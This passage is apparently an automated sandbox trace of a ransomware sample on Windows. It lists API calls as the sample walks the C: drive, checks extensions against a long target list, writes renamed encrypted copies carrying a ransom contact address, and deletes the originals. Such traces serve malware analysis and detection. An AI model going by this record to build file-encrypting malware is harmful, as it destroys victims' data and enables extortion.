lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.181] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0071.181] SetEndOfFile (hFile=0x380) returned 1 [0071.181] CloseHandle (hObject=0x380) returned 1 [0071.182] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.182] SetEndOfFile (hFile=0x370) returned 1 [0071.198] CloseHandle (hObject=0x370) returned 1 [0071.198] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0071.199] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102594.wmf")) returned 1 [0071.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF") returned 68 [0071.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF") returned 68 [0071.199] lstrlenW (lpString=".doc") returned 4 [0071.199] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0071.199] lstrlenW (lpString=".docx") returned 5 [0071.199] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0071.199] lstrlenW (lpString=".pdf") returned 4 [0071.199] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0071.199] lstrlenW (lpString=".xls") returned 4 [0071.199] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0071.199] lstrlenW (lpString=".xlsx") returned 5 [0071.199] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0071.199] lstrlenW (lpString=".ppt") returned 4 [0071.200] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0071.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF") returned 68 [0071.200] lstrlenW (lpString=".zip") returned 4 [0071.200] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0071.200] lstrlenW (lpString=".rar") returned 4 [0071.200] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0071.200] lstrlenW (lpString=".bz2") returned 4 [0071.200] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0071.200] lstrlenW (lpString=".7z") returned 3 [0071.200] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0071.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF") returned 68 [0071.200] lstrlenW (lpString=".dbf") returned 4 [0071.200] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0071.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF") returned 68 [0071.200] lstrlenW (lpString=".1cd") returned 4 [0071.200] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0071.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF") returned 68 [0071.200] lstrlenW (lpString=".jpg") returned 4 [0071.200] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0071.201] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.201] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105272.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0071.201] GetLastError () returned 0x0 [0071.201] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4540, lpOverlapped=0x0) returned 1 [0071.621] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4550, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4550, lpOverlapped=0x0) returned 1 [0071.622] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.622] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0071.622] SetEndOfFile (hFile=0x380) returned 1 [0071.662] CloseHandle (hObject=0x380) returned 1 [0071.662] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.662] SetEndOfFile (hFile=0x370) returned 1 [0071.663] CloseHandle (hObject=0x370) returned 1 [0071.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0071.663] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105272.wmf")) returned 1 [0071.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF") returned 68 [0071.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF") returned 68 [0071.663] lstrlenW (lpString=".doc") returned 4 [0071.663] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0071.664] lstrlenW (lpString=".docx") returned 5 [0071.664] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0071.664] lstrlenW (lpString=".pdf") returned 4 [0071.664] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0071.664] lstrlenW (lpString=".xls") returned 4 [0071.664] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0071.664] lstrlenW (lpString=".xlsx") returned 5 [0071.664] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0071.664] lstrlenW (lpString=".ppt") returned 4 [0071.664] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0071.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF") returned 68 [0071.664] lstrlenW (lpString=".zip") returned 4 [0071.664] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0071.664] lstrlenW (lpString=".rar") returned 4 [0071.664] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0071.664] lstrlenW (lpString=".bz2") returned 4 [0071.664] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0071.664] lstrlenW (lpString=".7z") returned 3 [0071.664] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0071.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF") returned 68 [0071.664] lstrlenW (lpString=".dbf") returned 4 [0071.664] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0071.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF") returned 68 [0071.664] lstrlenW (lpString=".1cd") returned 4 [0071.664] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0071.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF") returned 68 [0071.664] lstrlenW (lpString=".jpg") returned 4 [0071.664] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0071.665] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.665] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105286.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0071.665] GetLastError () returned 0x0 [0071.665] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x19a8, lpOverlapped=0x0) returned 1 [0072.253] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x19b0, lpOverlapped=0x0) returned 1 [0072.254] ReadFile (in: hFile=0x370, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0072.254] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0072.254] SetEndOfFile (hFile=0x380) returned 1 [0072.254] CloseHandle (hObject=0x380) returned 1 [0072.254] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0072.254] SetEndOfFile (hFile=0x370) returned 1 [0072.255] CloseHandle (hObject=0x370) returned 1 [0072.255] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0072.255] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105286.wmf")) Thread: id = 13 os_tid = 0xa98 [0045.429] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3bf0048 [0045.430] lstrlenW (lpString="C:") returned 2 [0045.430] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2e4fcf8 | out: lpFindFileData=0x2e4fcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x5e9918 [0045.430] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0045.430] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0045.430] lstrlenW (lpString="$GetCurrent") returned 11 [0045.430] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0045.430] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3c00050 [0045.431] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0045.431] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x5e9a18 [0045.453] FindNextFileW (in: hFindFile=0x5e9a18, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0045.454] FindNextFileW (in: hFindFile=0x5e9a18, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0045.454] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0045.454] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0045.454] lstrlenW (lpString="Logs") returned 4 [0045.454] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0045.454] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.457] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0045.457] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42602c8 [0045.553] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.570] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0045.570] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0045.570] lstrlenW (lpString=".1cd") returned 4 [0045.570] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0045.570] lstrlenW (lpString=".3ds") returned 4 [0045.570] lstrcmpiW (lpString1=".3ds", lpString2=".log") returned -1 [0045.570] lstrlenW (lpString=".3fr") returned 4 [0045.570] lstrcmpiW (lpString1=".3fr", lpString2=".log") returned -1 [0045.570] lstrlenW (lpString=".3g2") returned 4 [0045.570] lstrcmpiW (lpString1=".3g2", lpString2=".log") returned -1 [0045.570] lstrlenW (lpString=".3gp") returned 4 [0045.570] lstrcmpiW (lpString1=".3gp", lpString2=".log") returned -1 [0045.570] lstrlenW (lpString=".7z") returned 3 [0045.570] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0045.570] lstrlenW (lpString=".accda") returned 6 [0045.570] lstrcmpiW (lpString1=".accda", lpString2="66.log") returned -1 [0045.570] lstrlenW (lpString=".accdb") returned 6 [0045.570] lstrcmpiW (lpString1=".accdb", lpString2="66.log") returned -1 [0045.570] lstrlenW (lpString=".accdc") returned 6 [0045.570] lstrcmpiW (lpString1=".accdc", lpString2="66.log") returned -1 [0045.570] lstrlenW (lpString=".accde") returned 6 [0045.570] lstrcmpiW (lpString1=".accde", lpString2="66.log") returned -1 [0045.570] lstrlenW (lpString=".accdt") returned 6 [0045.570] lstrcmpiW (lpString1=".accdt", lpString2="66.log") returned -1 [0045.570] lstrlenW (lpString=".accdw") returned 6 [0045.570] lstrcmpiW (lpString1=".accdw", lpString2="66.log") returned -1 [0045.570] lstrlenW (lpString=".adb") returned 4 [0045.570] lstrcmpiW (lpString1=".adb", lpString2=".log") returned -1 [0045.570] lstrlenW (lpString=".adp") returned 4 [0045.570] lstrcmpiW (lpString1=".adp", lpString2=".log") returned -1 [0045.571] lstrlenW (lpString=".ai") returned 3 [0045.571] lstrcmpiW (lpString1=".ai", lpString2="log") returned -1 [0045.571] lstrlenW (lpString=".ai3") returned 4 [0045.571] lstrcmpiW (lpString1=".ai3", lpString2=".log") returned -1 [0045.571] lstrlenW (lpString=".ai4") returned 4 [0045.571] lstrcmpiW (lpString1=".ai4", lpString2=".log") returned -1 [0045.571] lstrlenW (lpString=".ai5") returned 4 [0045.571] lstrcmpiW (lpString1=".ai5", lpString2=".log") returned -1 [0045.571] lstrlenW (lpString=".ai6") returned 4 [0045.571] lstrcmpiW (lpString1=".ai6", lpString2=".log") returned -1 [0045.571] lstrlenW (lpString=".ai7") returned 4 [0045.571] lstrcmpiW (lpString1=".ai7", lpString2=".log") returned -1 [0045.571] lstrlenW (lpString=".ai8") returned 4 [0045.571] lstrcmpiW (lpString1=".ai8", lpString2=".log") returned -1 [0045.571] lstrlenW (lpString=".anim") returned 5 [0045.571] lstrcmpiW (lpString1=".anim", lpString2="6.log") returned -1 [0045.571] lstrlenW (lpString=".arw") returned 4 [0045.571] lstrcmpiW (lpString1=".arw", lpString2=".log") returned -1 [0045.571] lstrlenW (lpString=".as") returned 3 [0045.571] lstrcmpiW (lpString1=".as", lpString2="log") returned -1 [0045.571] lstrlenW (lpString=".asa") returned 4 [0045.571] lstrcmpiW (lpString1=".asa", lpString2=".log") returned -1 [0045.571] lstrlenW (lpString=".asc") returned 4 [0045.571] lstrcmpiW (lpString1=".asc", lpString2=".log") returned -1 [0045.571] lstrlenW (lpString=".ascx") returned 5 [0045.571] lstrcmpiW (lpString1=".ascx", lpString2="6.log") returned -1 [0045.571] lstrlenW (lpString=".asm") returned 4 [0045.571] lstrcmpiW (lpString1=".asm", lpString2=".log") returned -1 [0045.571] lstrlenW (lpString=".asmx") returned 5 [0045.571] lstrcmpiW (lpString1=".asmx", lpString2="6.log") returned -1 [0045.571] lstrlenW (lpString=".asp") returned 4 [0045.571] lstrcmpiW (lpString1=".asp", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".aspx") returned 5 [0045.572] lstrcmpiW (lpString1=".aspx", lpString2="6.log") returned -1 [0045.572] lstrlenW (lpString=".asr") returned 4 [0045.572] lstrcmpiW (lpString1=".asr", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".asx") returned 4 [0045.572] lstrcmpiW (lpString1=".asx", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".avi") returned 4 [0045.572] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".avs") returned 4 [0045.572] lstrcmpiW (lpString1=".avs", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".backup") returned 7 [0045.572] lstrcmpiW (lpString1=".backup", lpString2="766.log") returned -1 [0045.572] lstrlenW (lpString=".bak") returned 4 [0045.572] lstrcmpiW (lpString1=".bak", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".bay") returned 4 [0045.572] lstrcmpiW (lpString1=".bay", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".bd") returned 3 [0045.572] lstrcmpiW (lpString1=".bd", lpString2="log") returned -1 [0045.572] lstrlenW (lpString=".bin") returned 4 [0045.572] lstrcmpiW (lpString1=".bin", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".bmp") returned 4 [0045.572] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".bz2") returned 4 [0045.572] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".c") returned 2 [0045.572] lstrcmpiW (lpString1=".c", lpString2="og") returned -1 [0045.572] lstrlenW (lpString=".cdr") returned 4 [0045.572] lstrcmpiW (lpString1=".cdr", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".cer") returned 4 [0045.572] lstrcmpiW (lpString1=".cer", lpString2=".log") returned -1 [0045.572] lstrlenW (lpString=".cf") returned 3 [0045.573] lstrcmpiW (lpString1=".cf", lpString2="log") returned -1 [0045.573] lstrlenW (lpString=".cfc") returned 4 [0045.573] lstrcmpiW (lpString1=".cfc", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".cfm") returned 4 [0045.573] lstrcmpiW (lpString1=".cfm", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".cfml") returned 5 [0045.573] lstrcmpiW (lpString1=".cfml", lpString2="6.log") returned -1 [0045.573] lstrlenW (lpString=".cfu") returned 4 [0045.573] lstrcmpiW (lpString1=".cfu", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".chm") returned 4 [0045.573] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".cin") returned 4 [0045.573] lstrcmpiW (lpString1=".cin", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".class") returned 6 [0045.573] lstrcmpiW (lpString1=".class", lpString2="66.log") returned -1 [0045.573] lstrlenW (lpString=".clx") returned 4 [0045.573] lstrcmpiW (lpString1=".clx", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".config") returned 7 [0045.573] lstrcmpiW (lpString1=".config", lpString2="766.log") returned -1 [0045.573] lstrlenW (lpString=".cpp") returned 4 [0045.573] lstrcmpiW (lpString1=".cpp", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".cr2") returned 4 [0045.573] lstrcmpiW (lpString1=".cr2", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".crt") returned 4 [0045.573] lstrcmpiW (lpString1=".crt", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".crw") returned 4 [0045.573] lstrcmpiW (lpString1=".crw", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".cs") returned 3 [0045.573] lstrcmpiW (lpString1=".cs", lpString2="log") returned -1 [0045.573] lstrlenW (lpString=".css") returned 4 [0045.573] lstrcmpiW (lpString1=".css", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".csv") returned 4 [0045.573] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0045.573] lstrlenW (lpString=".cub") returned 4 [0045.573] lstrcmpiW (lpString1=".cub", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".dae") returned 4 [0045.574] lstrcmpiW (lpString1=".dae", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".dat") returned 4 [0045.574] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".db") returned 3 [0045.574] lstrcmpiW (lpString1=".db", lpString2="log") returned -1 [0045.574] lstrlenW (lpString=".dbf") returned 4 [0045.574] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".dbx") returned 4 [0045.574] lstrcmpiW (lpString1=".dbx", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".dc3") returned 4 [0045.574] lstrcmpiW (lpString1=".dc3", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".dcm") returned 4 [0045.574] lstrcmpiW (lpString1=".dcm", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".dcr") returned 4 [0045.574] lstrcmpiW (lpString1=".dcr", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".der") returned 4 [0045.574] lstrcmpiW (lpString1=".der", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".dib") returned 4 [0045.574] lstrcmpiW (lpString1=".dib", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".dic") returned 4 [0045.574] lstrcmpiW (lpString1=".dic", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".dif") returned 4 [0045.574] lstrcmpiW (lpString1=".dif", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".divx") returned 5 [0045.574] lstrcmpiW (lpString1=".divx", lpString2="6.log") returned -1 [0045.574] lstrlenW (lpString=".djvu") returned 5 [0045.574] lstrcmpiW (lpString1=".djvu", lpString2="6.log") returned -1 [0045.574] lstrlenW (lpString=".dng") returned 4 [0045.574] lstrcmpiW (lpString1=".dng", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".doc") returned 4 [0045.574] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0045.574] lstrlenW (lpString=".docm") returned 5 [0045.574] lstrcmpiW (lpString1=".docm", lpString2="6.log") returned -1 [0045.574] lstrlenW (lpString=".docx") returned 5 [0045.575] lstrcmpiW (lpString1=".docx", lpString2="6.log") returned -1 [0045.575] lstrlenW (lpString=".dot") returned 4 [0045.575] lstrcmpiW (lpString1=".dot", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".dotm") returned 5 [0045.575] lstrcmpiW (lpString1=".dotm", lpString2="6.log") returned -1 [0045.575] lstrlenW (lpString=".dotx") returned 5 [0045.575] lstrcmpiW (lpString1=".dotx", lpString2="6.log") returned -1 [0045.575] lstrlenW (lpString=".dpx") returned 4 [0045.575] lstrcmpiW (lpString1=".dpx", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".dqy") returned 4 [0045.575] lstrcmpiW (lpString1=".dqy", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".dsn") returned 4 [0045.575] lstrcmpiW (lpString1=".dsn", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".dt") returned 3 [0045.575] lstrcmpiW (lpString1=".dt", lpString2="log") returned -1 [0045.575] lstrlenW (lpString=".dtd") returned 4 [0045.575] lstrcmpiW (lpString1=".dtd", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".dwg") returned 4 [0045.575] lstrcmpiW (lpString1=".dwg", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".dwt") returned 4 [0045.575] lstrcmpiW (lpString1=".dwt", lpString2=".log") returned -1 [0045.575] lstrlenW (lpString=".dx") returned 3 